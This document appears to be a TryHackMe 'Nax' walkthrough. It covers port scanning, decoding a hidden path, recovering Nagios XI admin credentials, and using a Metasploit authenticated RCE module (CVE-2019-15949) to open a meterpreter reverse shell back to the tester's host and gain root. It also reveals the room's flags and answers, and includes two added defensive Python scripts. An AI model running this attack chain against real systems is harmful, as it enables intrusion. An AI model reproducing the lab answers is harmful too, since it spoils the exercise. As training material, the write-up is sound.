
【TryHackMe】Nax: Walkthrough

Overview

This is a walkthrough of the TryHackMe room "Nax".

Task 1

Q1. What hidden file did you find?

Run a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.221.5 -oN nmap_result
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
|   256 af:67:7d:24:e5:95:f4:44:72:d1:0c:39:8d:cc:21:15 (ECDSA)
|_  256 20:28:15:ef:13:c8:9f:b8:a7:0f:50:e6:2f:3b:1e:57 (ED25519)
25/tcp   open  smtp       Postfix smtpd
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-03-23T23:42:04
|_Not valid after:  2030-03-21T23:42:04
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=192.168.85.153/organizationName=Nagios Enterprises/stateOrProvinceName=Minnesota/countryName=US
| Not valid before: 2020-03-24T00:14:58
|_Not valid after:  2030-03-22T00:14:58
| tls-alpn: 
|_  http/1.1
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)

This shows which ports are open.

Port  Service   Version
22    ssh       OpenSSH 7.2p2
25    smtp      Postfix smtpd
80    http      Apache httpd 2.4.18
389   ldap      OpenLDAP 2.2.X - 2.3.X
443   ssl/http  Apache httpd 2.4.18
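As an added example (not part of the original walkthrough), the following Python script parses nmap's normal (-oN) output into the port/service/version summary above and reports two exposures that a defender can read straight from the scan text: LDAP on 389 without TLS and an SMTP banner that advertises VRFY. The embedded sample is a trimmed copy of the scan output shown above; all function names are this example's own.

```python
import re

# Added example, not from the original walkthrough: summarise `nmap -oN`
# output and derive defender-side findings from it. NMAP_OUTPUT is a trimmed
# copy of the scan shown on this page, embedded so the script runs offline.
NMAP_OUTPUT = """\
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 62:1d:d9:88:01:77:0a:52:bb:59:f9:da:c1:a6:e3:cd (RSA)
25/tcp   open  smtp       Postfix smtpd
|_smtp-commands: ubuntu.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
389/tcp  open  ldap       OpenLDAP 2.2.X - 2.3.X
443/tcp  open  ssl/http   Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
"""

# port/proto  state  service  [version...]
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return one dict per port line. NSE script lines ('|' / '|_') are
    attached to the most recent port as `scripts` so checks can use them."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": (version or "").strip(),
                         "scripts": []})
        elif line.startswith("|") and rows:
            rows[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return rows


def summary_table(rows):
    """Plain-text table in the same shape as the one in the walkthrough."""
    lines = [f"{'Port':<5} {'Service':<9} Version"]
    for r in rows:
        if r["state"] == "open":
            lines.append(f"{r['port']:<5} {r['service']:<9} {r['version']}")
    return "\n".join(lines)


def exposure_findings(rows):
    """Observations derived only from what the scan itself says."""
    findings = []
    for r in rows:
        if r["state"] != "open":
            continue
        if r["service"] == "ldap":
            findings.append(f"{r['port']}/{r['proto']}: LDAP reachable without TLS (ldap, not ldaps)")
        if r["service"] == "smtp":
            for s in r["scripts"]:
                if s.startswith("smtp-commands:") and "VRFY" in s:
                    findings.append(f"{r['port']}/{r['proto']}: SMTP advertises VRFY (allows account enumeration)")
    return findings


if __name__ == "__main__":
    parsed = parse_ports(NMAP_OUTPUT)
    print(summary_table(parsed))
    for f in exposure_findings(parsed):
        print("finding:", f)
```

The findings are deliberately limited to facts present in the scan output; anything that would require probing the host further (for example confirming the LDAP server allows anonymous binds) belongs in a separate, authorised check.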

Access port 80.

The page shows the text "Welcome to elements" together with a list of chemical element symbols.

Convert each element symbol to its atomic number.

Ag - Hg - Ta - Sb - Po - Pd - Hg - Pt - Lr
47 - 80 - 73 - 51 - 84 - 46 - 80 - 78 - 103

Reading the numbers as decimal ASCII codes reveals a path.

A. /PI3T.PNg

Q2. Who is the creator of the file?

Access /PI3T.PNg.

This is a program written in the Piet programming language.

A. Piet Mondrian

Q4. What is the username you found?

Decode it with the site below.

This gives the username and password.

A. nagiosadmin

Q5. What is the password you found?

Hint. % is a separator

A. n3p3UQ&9BjLp4$7uhWdY

Q6. What is the CVE number for this vulnerability? This will be in the format: CVE-0000-0000

Run a directory scan.

$ dirsearch -u http://10.10.20.93

[00:58:30] 200 -    1KB - /index.php
[00:58:31] 200 -    1KB - /index.php/login/
[00:58:32] 301 -  315B  - /javascript  ->  http://10.10.20.93/javascript/
[00:58:43] 401 -  458B  - /nagios
[00:58:43] 401 -  458B  - /nagios/

Log in at /nagiosxi/login.php with the credentials obtained.

The dashboard footer shows the version is Nagios XI 5.5.6.

Searching for vulnerabilities turns up a Metasploit module.

$ searchsploit "nagios xi"

(omitted)

Nagios XI - Authenticated Remote Command Execution (Metasploit)                           | linux/remote/48191.rb

The CVE can be confirmed in the module's source code.

/usr/share/exploitdb/exploits/linux/remote/48191.rb
'References'      =>
        [
          ['CVE', '2019-15949'],
          ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] #original PHP exploit
        ],

A. CVE-2019-15949

Q8. After Metasploit has started, let's search for our target exploit using the command 'search applicationame'. What is the full path (starting with exploit) for the exploitation module?

Hint. Check with MSF6+

Start Metasploit and search for the module.

msf6 > search nagios xi

(omitted)

18  exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce  2019-07-29       excellent  Yes    Nagios XI Prior to 5.6.6 getprofile.sh Authenticated Remote Command Execution

A. exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce
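The module title states the affected range as "Prior to 5.6.6". The following Python snippet, an added example that is not from the walkthrough or the Metasploit module, turns a version string such as the dashboard footer's "Nagios XI 5.5.6" into an integer tuple and compares it against that fixed version, so an asset inventory can flag hosts that still need patching for CVE-2019-15949. The hosts other than 10.10.20.93 are constructed placeholders; the function names are the example's own.

```python
import re

# Added example (not from the walkthrough or the Metasploit module): decide
# whether a Nagios XI version string falls in the range affected by
# CVE-2019-15949, described by the module as "Prior to 5.6.6".
FIXED_VERSION = (5, 6, 6)   # first release that is not affected

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract a (major, minor, patch) tuple from strings such as
    'Nagios XI 5.5.6' or '5.6.10'. Raises ValueError when no version is
    present so a missing footer is not silently treated as patched."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in m.groups())


def is_affected_by_cve_2019_15949(text):
    # Compare as integer tuples: a plain string comparison would rank
    # '5.10.0' below '5.6.6' and wrongly report a patched host as vulnerable.
    return parse_version(text) < FIXED_VERSION


def triage(footers):
    """Map host -> 'patch required' / 'ok' for a dict of host: footer text."""
    return {host: ("patch required" if is_affected_by_cve_2019_15949(text) else "ok")
            for host, text in footers.items()}


if __name__ == "__main__":
    # Constructed sample: the version seen in this room plus two hypothetical hosts.
    print(triage({"10.10.20.93": "Nagios XI 5.5.6",
                  "host-b": "Nagios XI 5.6.6",
                  "host-c": "Nagios XI 5.10.0"}))
```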

Q9. Compromise the machine and locate user.txt

Set the module options.

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > show options

Module options (exploit/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce):

   Name            Current Setting       Required  Description
   ----            ---------------       --------  -----------
   FINISH_INSTALL  false                 no        If the Nagios XI installation has not been completed, try to do so. Thi
                                                   s includes signing the license agreement.
   PASSWORD        n3p3UQ&9BjLp4$7uhWdY  yes       Password to authenticate with
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          10.10.20.93           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasplo
                                                   it/basics/using-metasploit.html
   RPORT           80                    yes       The target port (TCP)
   SSL             false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                               no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/            yes       The base path to the Nagios XI application
   URIPATH                               no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin           yes       Username to authenticate with
   VHOST                                 no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the lo
                                       cal machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.6.55.144      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux (x64)

Running the module yields a shell with root privileges.

msf6 exploit(linux/http/nagios_xi_plugins_check_plugin_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI.
[*] Target is Nagios XI with version 5.5.6.
[+] The target appears to be vulnerable.
[*] Uploading malicious 'check_ping' plugin...
[*] Command Stager progress - 100.00% done (897/897 bytes)
[+] Successfully uploaded plugin.
[*] Executing plugin...
[*] Waiting up to 300 seconds for the plugin to request the final payload...
[*] Sending stage (3045380 bytes) to 10.10.20.93
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.20.93:37550) at 2024-11-08 01:27:38 -0500
[*] Deleting malicious 'check_ping' plugin...
[+] Plugin deleted.

meterpreter > shell
Process 15163 created.
Channel 1 created.
whoami
root

The user flag is in /home/galand/user.txt.

/home/galand/user.txt
THM{84b17add1d72a9f2e99c33bc568ae0f1}

A. THM{84b17add1d72a9f2e99c33bc568ae0f1}

Q. Locate root.txt

The root flag is in /root/root.txt.

/root/root.txt
THM{c89b2e39c83067503a6508b21ed6e962}

A. THM{c89b2e39c83067503a6508b21ed6e962}
